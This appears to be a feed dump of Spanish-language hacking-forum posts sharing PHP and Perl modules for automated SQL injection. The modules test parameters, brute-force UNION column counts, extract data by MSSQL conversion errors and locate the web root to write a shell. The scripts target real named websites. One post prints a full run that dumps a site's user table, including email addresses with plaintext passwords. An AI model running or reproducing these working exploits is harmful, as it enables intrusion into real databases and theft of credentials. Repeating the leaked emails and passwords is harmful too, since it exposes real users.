- ISIR https://foro.undersecurity.net/list.php?66Thu, 09 Sep 2010 08:59:35 -0400 Phorum 5.2.15a https://foro.undersecurity.net/read.php?66,7826,7826#msg-7826 Modulo[6] : Union Brutal Mode 0,1 (2 replies)https://foro.undersecurity.net/read.php?66,7826,7826#msg-7826
Cuando ya Ningun otro Metodo lo detecta, si es Union SQL; este metodo lo detectara.
 php brute.php
..........................
[+] Vulnerable Bruter Mode¡ :	2:3:4:5:6:7:8:9:


<?
/* Union Brutal Mode 0,1
Coded By OzX
Undersecurity.net
*/

function GET($url){
	 $ch = curl_init($url);
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER  ,1);
	 curl_setopt($ch, CURLOPT_HEADER      ,0); 
	 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
	 $data = curl_exec($ch);
	 curl_close($ch);
return $data;	 
}
function replace($output,$value,$patron){
			$output[$value] =  $output[$value].$patron;
			return urldecode(http_build_query($output));
}
function hexsql($text){
	return '0x'.strtoupper(bin2hex($text));
}
$url = "http://313.canal13.cl/contenido.php?id_contenido=2";
#$url = "http://extranet.injuv.gob.cl/extranet/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=48";
$total = 30;#NORMALMENTE NO TIENEN MAS DE 30|editable

for($x=1;$x<=$total;$x++){
	for($i=1;$i<=$x;$i++){
		$rows.=($i==$x) ? hexsql("U:".$i.":S") : hexsql("U:".$i.":S").",";
	}
$patrones[] = "+and+1=0+union+select+all+".$rows."+from+dual+--+";#NORMAL
$patrones[] = "'+and+1=0+union+select+all+".$rows."+from+dual+--+";#MAGIC
unset($rows);
}
		$partes_url = parse_url($url);
		$scheme = $partes_url['scheme'];
		$host  = $partes_url['host'];
		$path = $partes_url['path'];
		$query = $partes_url['query'];
	
		parse_str($query, $output);
		$keys = array_keys($output);

		foreach($keys as $key){
			foreach($patrones as $patron){
				$urls[] = $scheme."://".$host.$path."?".replace($output,$key,$patron);
		
			}
		}

		
foreach($urls as $url){

		if(preg_match_all("/U:(\d*):S/im", GET($url), $datos,PREG_SET_ORDER)){
			echo "\n[+] Vulnerable Bruter Mode¡ :\t";
			$total = count($datos);
			for($x=0;$x<$total;$x++){
				echo $datos[$x][1].":";
			}
		break 1;
		}else{
			echo ".";
		}
}
echo "\n";




?>
]]> OzX ISIRFri, 13 Aug 2010 22:27:16 -0400 https://foro.undersecurity.net/read.php?66,7765,7765#msg-7765 Modulo [5] : Forma Url Injection 0.2 (1 reply)https://foro.undersecurity.net/read.php?66,7765,7765#msg-7765
Salida :

http://www.losandesdaem.cl/index.php?nombre=Categorias&area=8&seccion=39+and+1=0+union+select+all+1+--+&accion=Leer&id=279
Array
(
    [0] => 1

)


<?


/*
Coded by OzX
Undersecurity
Modulo ISIR : Forma Url Injection 0.2

*/

function hexsql($text){
	return '0x'.strtoupper(bin2hex($text));
}

function forma_query_inj($url,$patron,$inj){
		$partes_url = parse_url($url);
		$query = $partes_url['query'];
		$scheme = $partes_url['scheme'];
		$host  = $partes_url['host'];
		$path = $partes_url['path'];
		parse_str($query, $querys);
		foreach($querys as $q => $values){
			if(preg_match('/'.urldecode($patron).'/',$values)){
				$querys[$q]  =  str_replace(urldecode($patron), $inj, $values);
			}
		}
$query =  urldecode(http_build_query($querys));
return $scheme."://".$host.$path."?".$query;
}
/*
FUncion que detecta si es posible ocupar Order By para obtener la cantidad de tablas de la
consulta original
*/
function detecta_orderby($url,$patron){
	$inj = "+and+1=1+--+";
	$url_order[] = forma_query_inj($url,$patron,$inj); #URL ORIGINAL
	$inj = "+and+1=1+order+by+987654321+--+";
	$url_order[] = forma_query_inj($url,$patron,$inj); # ORDER BY 987654321
	$inj = "+and+1=1+order+by+1+--+";
	$url_order[] = forma_query_inj($url,$patron,$inj);# ORDER BY 1

	$curl = curl_init();
	curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
	foreach($url_order as $url){
		curl_setopt($curl, CURLOPT_URL, $url);
		$html = curl_exec($curl); 
		$size[] = curl_getinfo($curl,CURLINFO_SIZE_DOWNLOAD);
		if(preg_match("/Unknown column '987654321' in 'order clause'/",$html)){
			return true;//Acceso Directo a la Deteccion de Order By 
		}	
	}
	curl_close($curl);

return   ($size[0] == $size[2] && $size[1] != $size[0]) ? true : false;
}

function make_url_union($url,$patron){
	for($x=1;$x<=10;$x++){
		for($i=1;$i<=$x;$i++){
			$t.= hexsql("IS".$i."IR").",";			
		}
	$t = rtrim($t,",");
	$inj = "+and+1=0+union+select+all+".$t."+--+";
	$url_order[] = forma_query_inj($url,$patron,$inj);# ORDER BY 1	
	unset($t);
	}	

	$curl = curl_init();
	curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

	$total_url = count($url_order);
	for($i=0;$i<=$total_url;$i++){
		curl_setopt($curl, CURLOPT_URL, $url_order[$i]);
		$html = curl_exec($curl); 
		if(preg_match_all("/IS(\d*)IR/im", $html, $datos,PREG_SET_ORDER)){
			$total = count($datos);
			for($x=0;$x<$total;$x++){
				$numeros_utilizar[] =  $datos[$x][1]."\n";
			}
			for($v=1;$v<=$i+1;$v++){
				$t.= $v.",";			
			}
			$t = rtrim($t,",");
			$inj = "+and+1=0+union+select+all+".$t."+--+";
			$url_union_all = forma_query_inj($url,$patron,$inj);# URL FINAL
			break 1;
		}
	}
	curl_close($curl);
return array($url_union_all,$numeros_utilizar);
}

$patron = "+and+1=0+--+";

$url = "http://www.losandesdaem.cl/index.php?nombre=Categorias&area=8&seccion=39+and+1=0+--+&accion=Leer&id=279";
#$url = "http://www.salumax.com.ar/sitio/pantalla.php?id=4+and+1=0+--+";
#$url = "http://www.cam-mantenimiento.com.ar/vernota.php?id=89+and+1=0+--+";




$estado_orderby = detecta_orderby($url,$patron);
if($estado_orderby){

	list($url_union_all,$numeros) = make_url_union($url,$patron);
	echo $url_union_all."\n";
	print_r($numeros);
	
}else{ #BRUTE FORCE ¡¡¡
	echo "Bruter \n";
}
#

?>
]]> OzX ISIRMon, 09 Aug 2010 06:45:36 -0400 https://foro.undersecurity.net/read.php?66,7718,7718#msg-7718 [+] Modulo 4 : sube shell con into outfile (3 replies)https://foro.undersecurity.net/read.php?66,7718,7718#msg-7718 <?php $url = $argv[1]; //http://localhost/test.php?usuario= if(!$path = get_path_error($url)){ if(!$path = get_path_httpdconf($url, $argv[2], $argv[3])){ $path = 'no anduvo'; } } echo $path; /* Mete una comilla y agarra el warning de php. Necesita error_reporting = 1 */ function get_path_error($url){ $url.= "' srch"; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER ,1); curl_setopt($ch, CURLOPT_HEADER ,1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); preg_match('@<b>Warning</b>: .+? in <b>(.+?)</b> on line <b>[0-9]+</b><br />@', $data, $resultados); if($resultados[1]){ return dirname($resultados[1]); //dirname es para eliminar el nombre del archivo }else{ return FALSE; } } /* Trata de cargar el archivo de configuracion con load_file() */ function get_path_httpdconf($url, $cantidad_columnas, $columna_visible){ // http://wiki.apache.org/httpd/DistrosDefaultLayout $httpdconf_location = array( 'C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', '/usr/pkg/etc/httpd/httpd.conf', '/usr/local/etc/apache22/httpd.conf', '/usr/local/etc/apache2/httpd.conf', '/etc/apache2/apache2.conf', '/etc/apache2/httpd.conf', '/etc/httpd/httpd.conf', '/etc/httpd/conf/httpd.conf', '/etc/conf.d/apache2', '/opt/lampp/etc/httpd.conf', ); foreach ($httpdconf_location as $httpdconf){ //Esta parte es provisoria. Se supone que otra parte del programa tiene que armar bien la inyección $url_completa = $url . urlencode("-1 union select "); // $url_completa = $url . urlencode("-1' union select "); for ($i=1; $i<=$cantidad_columnas; $i++){ if($columna_visible == $i){ $url_completa.= urlencode("concat(0x504154484d415443484845524531, load_file(0x".bin2hex($httpdconf)."), 0x504154484d415443484845524532)"); //load_file() y dos strings a los costados que nos sirven para saber con que parte quedarnos }else{ $url_completa.= $i; } if($i != $cantidad_columnas){ $url_completa.=','; } } $url_completa.= urlencode(" -- '"); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER ,1); curl_setopt($ch, CURLOPT_HEADER ,1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); curl_setopt($ch, CURLOPT_URL, $url_completa); $data = curl_exec($ch); preg_match('@PATHMATCHHERE1(.*?)PATHMATCHHERE2@s', $data, $archivo); //aislamos el archivo preg_match('@DocumentRoot "(.+?)"@i', $archivo[1], $resultados); //leemos el documentroot if($resultados[1]){ return $resultados[1]; } } return FALSE; } ?> @ozx es de lo que hablamos anoche

la primera funcion mete una comilla y captura la ruta del error de mysql
la segunda busca el httpd.conf con load_file y saca el document_root de ahi. No se que pasa si hay vhosts (alguien que los sepa configurar podria dar una mano?)
OJO que no son lo mismo las dos rutas]]> seth ISIRWed, 04 Aug 2010 19:12:15 -0400 https://foro.undersecurity.net/read.php?66,7610,7610#msg-7610 Modulo [3] : MSSQL MODULE (no replies)https://foro.undersecurity.net/read.php?66,7610,7610#msg-7610Obtiene los Datos mediante error de conversión INT.
Para Ocuparla ahi q descomentar algunas partes, por ej si se desea ocupar para obtener tablas, o columnas u obtener datos.

<?
ob_implicit_flush(1);
error_reporting(E_NONE);
/*
PROYECTOS UNDERSECURITY.NET
#ISIR [#] MSSQL MODULE
- 0.1  14 Julio 2010
*/

function GET($url){
	 $ch = curl_init($url);
	 curl_setopt($ch, CURLOPT_RETURNTRANSFER  ,1);
	 curl_setopt($ch, CURLOPT_HEADER      ,0); 
	 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
	 $data = curl_exec($ch);
	 curl_close($ch);
return $data;	 
}

	
			
$tablas = array('');
$campo = 'campo';
$table = 'tabla';
$url = "http://www.12manage.com/profile.asp?m=drarupbarman";

#OBTENER TABLAS
#$q = "select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('')";
#OBTENER CAMPOS
#$q = "select+top+1+column_name+from+information_schema.columns+where+table_name='{$table}'+and+column_name+not+in+('')";
#OBTENER DATOS
$q = "select+top+1+{$campo}+from+{$table}+where+{$campo}+not+in+('')";

function not_int($tablas){
//Ordena las tablas dentro de not+int+('tabla1','tabla2',etc..)
	foreach ($tablas as $tabla){
		if(end($tablas) != $tabla){
			$t .= "'".$tabla."',";
		}else{
			$t .= "'".$tabla."'";
		}
	}
return $t;
}

function convert($url,$query,$tablas){
	#posiciona dentro de convert(int,()) la consulta.
	$consulta = str_replace("not+in+('')", "not+in+(".not_int($tablas).")", $query);
	return $url."'+and+1=convert(int,(".$consulta."))+--";#CON COMILLAS.
	#return $url."+and+1=convert(int,(".$consulta."))+--";#SIN COMILLAS.
}



while(1){
$peticion =  convert($url,$q,$tablas);
echo $peticion."\n";
preg_match_all("|value '(.*?)' to|",GET($peticion),$out, PREG_PATTERN_ORDER);#OPTIMIZAR PETICIONES ¡
$valor_actual = current(array_pop($out));
$tablas[] = (!empty($valor_actual)) ? $valor_actual : die("OUT");#valor actual
print_r($tablas);
}
#Syntax error converting the nvarchar  a column of data type in




?>


EJEMPLO : Obtencion de Tablas
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('')))+--
Array
(
    [0] => 
    [1] => comd_list
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
    [4] => sysdiagrams
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp','sysdiagrams')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
    [4] => sysdiagrams
    [5] => Reg_Arrt
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp','sysdiagrams','Reg_Arrt')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
    [4] => sysdiagrams
    [5] => Reg_Arrt
    [6] => kill_kk
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp','sysdiagrams','Reg_Arrt','kill_kk')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
    [4] => sysdiagrams
    [5] => Reg_Arrt
    [6] => kill_kk
    [7] => dtproperties787
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp','sysdiagrams','Reg_Arrt','kill_kk','dtproperties787')))+--
Array
(
    [0] => 
    [1] => comd_list
    [2] => D99_CMD
    [3] => D99_Tmp
    [4] => sysdiagrams
    [5] => Reg_Arrt
    [6] => kill_kk
    [7] => dtproperties787
    [8] => Users
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','comd_list','D99_CMD','D99_Tmp','sysdiagrams','Reg_Arrt','kill_kk','dtproperties787','Users')))+--

Luego Descomento La linea para Obtener los Campos :
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='Users'+and+column_name+not+in+('')))+--
Array
(
    [0] => 
    [1] => Emailaddress
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='Users'+and+column_name+not+in+('','Emailaddress')))+--
Array
(
    [0] => 
    [1] => Emailaddress
    [2] => Password
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='Users'+and+column_name+not+in+('','Emailaddress','Password')))+--


Ahora Obtengo los Datos Por Separado : EMAIL

http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Emailaddress+from+Users+where+Emailaddress+not+in+('')))+--
Array
(
    [0] => 
    [1] => __________test@12manage.com
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Emailaddress+from+Users+where+Emailaddress+not+in+('','__________test@12manage.com')))+--
Array
(
    [0] => 
    [1] => __________test@12manage.com
    [2] => __olia@mail.ru
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Emailaddress+from+Users+where+Emailaddress+not+in+('','__________test@12manage.com','__olia@mail.ru')))+--
Array
(
    [0] => 
    [1] => __________test@12manage.com
    [2] => __olia@mail.ru
    [3] => _admiration_@mail.ru
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Emailaddress+from+Users+where+Emailaddress+not+in+('','__________test@12manage.com','__olia@mail.ru','_admiration_@mail.ru')))+--
Array
(
    [0] => 
    [1] => __________test@12manage.com
    [2] => __olia@mail.ru
    [3] => _admiration_@mail.ru
    [4] => _anastasijka_@inbox.ru
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Emailaddress+from+Users+where+Emailaddress+not+in+('','__________test@12manage.com','__olia@mail.ru','_admiration_@mail.ru','_anastasijka_@inbox.ru')))+--
Array
(
    [0] => 
    [1] => __________test@12manage.com
    [2] => __olia@mail.ru
    [3] => _admiration_@mail.ru
    [4] => _anastasijka_@inbox.ru
    [5] => _azalia_@ukr.net
)

Y ahora las Password :
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Password+from+Users+where+Password+not+in+('')))+--
Array
(
    [0] => 
    [1] => noUUDoOL
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Password+from+Users+where+Password+not+in+('','noUUDoOL')))+--
Array
(
    [0] => 
    [1] => noUUDoOL
    [2] => fvdXQIM3
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Password+from+Users+where+Password+not+in+('','noUUDoOL','fvdXQIM3')))+--
Array
(
    [0] => 
    [1] => noUUDoOL
    [2] => fvdXQIM3
    [3] => eyeEGHsg
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Password+from+Users+where+Password+not+in+('','noUUDoOL','fvdXQIM3','eyeEGHsg')))+--
Array
(
    [0] => 
    [1] => noUUDoOL
    [2] => fvdXQIM3
    [3] => eyeEGHsg
    [4] => fue67foD
)
http://www.12manage.com/profile.asp?m=drarupbarman'+and+1=convert(int,(select+top+1+Password+from+Users+where+Password+not+in+('','noUUDoOL','fvdXQIM3','eyeEGHsg','fue67foD')))+--
Array
(
    [0] => 
    [1] => noUUDoOL
    [2] => fvdXQIM3
    [3] => eyeEGHsg
    [4] => fue67foD
    [5] => XBh0VEgP
)


Datos :

__________test@12manage.com : noUUDoOL
 __olia@mail.ru : fvdXQIM3
 _admiration_@mail.ru : eyeEGHsg
 _anastasijka_@inbox.ru : fue67foD
 _azalia_@ukr.net :XBh0VEgP


And VUALA¡


Saludos¡]]> OzX ISIRWed, 14 Jul 2010 23:26:15 -0400 https://foro.undersecurity.net/read.php?66,7112,7112#msg-7112 Modulo[2] : Brute Order 0.2 (3 replies)https://foro.undersecurity.net/read.php?66,7112,7112#msg-7112
php func.php 
Rows Visibles :> 
Array
(
    [0] => 4

    [1] => 4

    [2] => 7

    [3] => 6

    [4] => 8

    [5] => 5

)
Total Rows :> 12

Significa que Tiene 12 Rows > union+select+all+1,2,3,4,5,6,7,8,9,10,11,12
Y que 4,4,7,6,8,5 Se pueden ocupar para hacer injecciones.

IMPORTANTE :

En la url , no importa cual query se va a ocupar, tiene que terminar con +--+
ej :

http://www.evil.com/modulos.php?mod=documentos&cat=38+and+char(99)=char(98)+--+&fn=5970ce332198baece7cde000c7169bf0


Saludos¡

Code :
<?
//BRuter 0.2 SIR Bruter
//Coded by Oz¡
//Undersecurity.net
function GET($url) {
	$curl = curl_init();
 	curl_setopt($curl, CURLOPT_URL, $url);
	curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
	curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com');
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
	if (!$html = curl_exec($curl))
		$html = file_get_contents($url);
	curl_close($curl);
return strtolower($html); 
}

function hexsql($text){
return '0x'.strtoupper(bin2hex($text));
}

define("limite_orderby", "99");





function bruter($url){

	$query = parse_url($url,PHP_URL_QUERY);
	$base = parse_url($url,PHP_URL_PATH);
	$host = parse_url($url,PHP_URL_HOST);
	$http = parse_url($url,PHP_URL_SCHEME);


	for($x=1;$x<=limite_orderby;$x++){
		$order = null;
		foreach (range(1, $x) as $number)
		    $order .= hexsql("YB:".$number.":YB").",";
		$t = rtrim($order,",");
		$web =  $http."://".$host.$base."?".str_replace("+--+","+union+all+select+".$t."+--+",$query);
		if(preg_match_all("/YB:(.*?):YB/i",GET($web),$datos,PREG_SET_ORDER)){
			$total = $x;
			foreach($datos as $row => $id)
				$rows[] = $id[1]."\n";	
			break 1; //SALIMOS DEL FOR PRINCIPAL
		}
	
	}
	return array($rows,$total);
}

$url = "http://www.evil.com/modulos.php?mod=documentos&cat=38+and+char(99)=char(98)+--+&fn=5970ce332198baece7cde000c7169bf0";


list($rows,$total) = bruter($url);
echo "Rows Visibles :> \n";
print_r($rows);
echo "Total Rows :> ".$total."\n";

# 
?>
]]> OzX ISIRTue, 11 May 2010 22:17:17 -0400 https://foro.undersecurity.net/read.php?66,6884,6884#msg-6884 Modulo [1] : Query Check Vulnz 0.3 (3 replies)https://foro.undersecurity.net/read.php?66,6884,6884#msg-6884 <? #coded by OzX # Undersecurity.net # ISIR # Query Check Vulnz 0.3 function check($url){ function crear_urls($url,$patrones){ function replace($output,$value,$patron){ $output[$value] = $output[$value].$patron; return urldecode(http_build_query($output)); } $partes_url = parse_url($url); $scheme = $partes_url['scheme']; $host = $partes_url['host']; $path = $partes_url['path']; $query = $partes_url['query']; parse_str($query, $output); $keys = array_keys($output); foreach($keys as $key){ foreach($patrones as $patron){ $query_url[] = $scheme."://".$host.$path."?".replace($output,$key,$patron); } } $return = array($query_url,count($output)); return $return; } $patrones = array("magic-" => "'and+1=0+--+", "magic+" => "'+and+1=1+--+", "-" => "+and+1=0+--+", "+" => "+and+1=1+--+" ); list($query_url,$total_querys_url) = crear_urls($url,$patrones); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER ,1); curl_setopt($ch, CURLOPT_HEADER ,1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); #ORIGINAL ########################################################## curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); #$valor_space = str_word_count($data); #$valor_space = count(explode("\n",$data)); $info = curl_getinfo($ch); $info['header_size']; $info['request_size']; $valor_space = $info['size_download']; echo "Total Querys :>".$total_querys_url."\n"; echo "ORIGINAL :> \t".$valor_space."\n"; echo "#########################################\n"; $i=0; echo "[-] ".$url ."\n"; echo "[+] SQLSIR : "; for($x=0;$x<$total_querys_url;$x++){ foreach($patrones as $patron => $value){ echo ".\n"; //MODIFICAR PORQUE NO SIEMPRE FUNCIONA CON \n, aveces contando palabras etc. $web[$patron] = $query_url[$i]; $webs_all[$value] = $web[$patron];//Asi Podemos encontrar el patron correspondiente. *COmpatbilidad entre modulos curl_setopt($ch, CURLOPT_URL, $query_url[$i]); $data = curl_exec($ch); #$valores[$patron] = str_word_count($data); #$valores[$patron] = count(explode("\n",$data)); $info = curl_getinfo($ch); #$info['header_size']; #$info['request_size']; $valores[$patron] = $info['size_download']; echo $query_url[$i]." =>" . $valores[$patron]."\n"; $i++; } if($valor_space != $valores['magic-'] && $valor_space == $valores['magic+']){# VALOR ORIGINAL != '+AND+1=0+--+ E IGUAL A '+AND+1=1+--+ $patron = array_search($web['magic-'], $webs_all); $resultado[]=array('vulnerable' => true,'magic' => true , 'url+' => $web['magic+'] , 'url-' => $web['magic-'], 'patron' => $patron); }elseif($valor_space != $valores['-'] && $valor_space == $valores['+']){# VALOR ORIGINAL != +AND+1=0+..+ E IGUAL A +AND+1=1+--+ $patron = array_search($web['-'], $webs_all); $resultado[] = array('vulnerable' => true,'magic' => false , 'url+' => $web['+'] , 'url-' => $web['-'], 'patron' => $patron); }else{ #echo "\n###############################################\n"; #$resultado[] = array('vulnerable' => false); } unset($valores); unset($web); } curl_close($ch); #echo "WEB \n"; print_r($webs_all); return $resultado; } $url = "http://www.cam-mantenimiento.com.ar/vernota.php?id=89"; #$url = "http://www.losandesdaem.cl/index.php?nombre=Categorias&area=8&seccion=39&accion=Leer&id=279"; print_r(check($url)); ?>

Retorna :
Array
(
    [0] => Array
        (
            [vulnerable] => 1
            [magic] => 
            [url+] => http://www.cam-mantenimiento.com.ar/vernota.php?id=89+and+1=1+--+
            [url-] => http://www.cam-mantenimiento.com.ar/vernota.php?id=89+and+1=0+--+
            [patron] => +and+1=0+--+
        )

)
]]> OzX ISIRMon, 09 Aug 2010 00:33:01 -0400 https://foro.undersecurity.net/read.php?66,5152,5152#msg-5152 Lenguaje PHP. (2 replies)https://foro.undersecurity.net/read.php?66,5152,5152#msg-5152EN modo consola.

Esop, para aclarar xD¡
Saludos¡]]> OzX ISIRSun, 15 Nov 2009 12:51:11 -0500 https://foro.undersecurity.net/read.php?66,4532,4532#msg-4532 Problemas con perl. (15 replies)https://foro.undersecurity.net/read.php?66,4532,4532#msg-4532y volver a retomar perl, para mi es volver atraz (pase de perl a php).

Por eso, para los interesados, del proyecto, alistense en este hilo , y voten segun su opcion perl o php. Se cierra en 1 semana.
Si nadie dice nada, al respecto, osea ningun interesado, voy a empezar nuevamente con php.


Saludos¡]]> OzX ISIRSun, 25 Oct 2009 15:18:27 -0400 https://foro.undersecurity.net/read.php?66,4469,4469#msg-4469 Reverse DNS (7 replies)https://foro.undersecurity.net/read.php?66,4469,4469#msg-4469
Language: Perl
use LWP::UserAgent;
use HTTP::Request;
 
print "Usage: perl script.pl <web>\n";
print "Ex: perl reversedns.pl www.pagina.com\n";
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
 
my $busqueda = new HTTP::Request GET =>"http://www.ip-adress.com/reverse_ip/$ARGV[0]";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();
 
while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){
 
    open (DNS,">>reverse_dns.txt");
    print DNS "$1\n";
    close (DNS);
    print "$1\n";
 
 
}
]]> yoyahack ISIRWed, 04 Aug 2010 11:58:34 -0400 https://foro.undersecurity.net/read.php?66,4457,4457#msg-4457 Verificar Input por Input en una url ?var=32&ver=32&vez=33 (no replies)https://foro.undersecurity.net/read.php?66,4457,4457#msg-4457Se trata de ir verificando cada valor get , post, etc por separado.
por ej tenemos la siguiente url.

http://www.locahost.tv/index.php?action=32&idpro=216&lng=566


http://www.locahost.tv/index.php?action=32+and+1=0&idpro=216&lng=56
http://www.locahost.tv/index.php?action=32&idpro=216+and+1=0&lng=56
http://www.locahost.tv/index.php?action=32&idpro=216&lng=56+and+1=0

Si se fijan bien, el script descripta las query y genera 1 consulta separada por cada url.

Language: Perl
use URI::URL;
 use URI::Escape;
 
#Coded By OzX SQL INPUT RIPPER 0.1 
#YASBU MODULE
#Undersecurity.net
 
sub make($url,$c){
	$url = $_[0];
	$c = $_[1];
	my (@query,@matriz) = undef;
	@query     = $url->query_form;
	$loop = 0;
	$control = 1;
	foreach $q (@query){
		if($loop % 2 == 0){
			push(@matriz,$q);
		}else{
			if ($control == $c){		
				$q = $q."+and+1=0";#cambiar
				push(@matriz,$q);
				$control = undef;
 
			}else{
				push(@matriz,$q);
					if ($control != undef){
						$control++;
					}
			}
		}
	$loop++;
	}
return @matriz;
}
 
 
sub make_querys{
	$uri = $_[0];
	$url = new URI::URL $uri;
	return $url->query_form();
}
 
sub show{
	$url = $_[0];
	$x = $_[1];
	my ($url) = undef;
	$url = new URI::URL $uri;
	@matriz = &make($url,$x);
	$url->query_form(@matriz);
	#print uri_unescape($url)."\n";
	return $url;
 
}
$uri = "http://www.locahost.tv/index.php?action=32&idpro=216&lng=56";
 
 
@query = make_querys($uri);
$controlq = scalar(@query) / 2 ;
 
for($x=1;$x<=$controlq;$x++){
	print uri_unescape(show($url,$x))."\n";
}


Tengo un par de puntos que optimiazar, como es el caso de la obtencion del array desde query_form.

Saludos¡]]> OzX ISIRTue, 29 Sep 2009 20:44:04 -0400 https://foro.undersecurity.net/read.php?66,4397,4397#msg-4397 parse_url() (no replies)https://foro.undersecurity.net/read.php?66,4397,4397#msg-4397
Language: Perl
#!/usr/bin/perl
 
%data=parse_url("http://sorgle.com.ar/some_dir/another/index.php?id=999&user=root&ls=asdaeeeds", 1);
printf("MIME: %s
Host: %s
Dirs: %s
File: %s
Request: %s
", $data{mime_type}, $data{host}, $data{directories}, $data{file}, $data{requests});
 
sub parse_url{
	my $url=shift;
	my $bool_req=shift||0;
	my $req_separator=shift||"&";
	my (@vars, @content);
 
	%parsed=(
		'mime_type',
		'host',
		'directories',
		'file',
		'requests'
	);
 
	($parsed{mime_type}, $parsed{host}, $parsed{directories}, $parsed{file}, $parsed{requests})=$url=~m/
(?=^(http[s]*){1}\:\/\/
	(?:
		(
			(?:[a-z0-9\-]+\.)*[a-z0-9\-]+\.(?:com|net|org|biz|co|it)(?:\.(?:ar|cl|ir|ur|br))*
				|
			(?:[0-9]{1,3}\.){3}[0-9]{1,3}
		)
	)
	(\/+
		(?:[a-z0-9\-\_\s\.\;]+\/+)*
	)+
	(?:
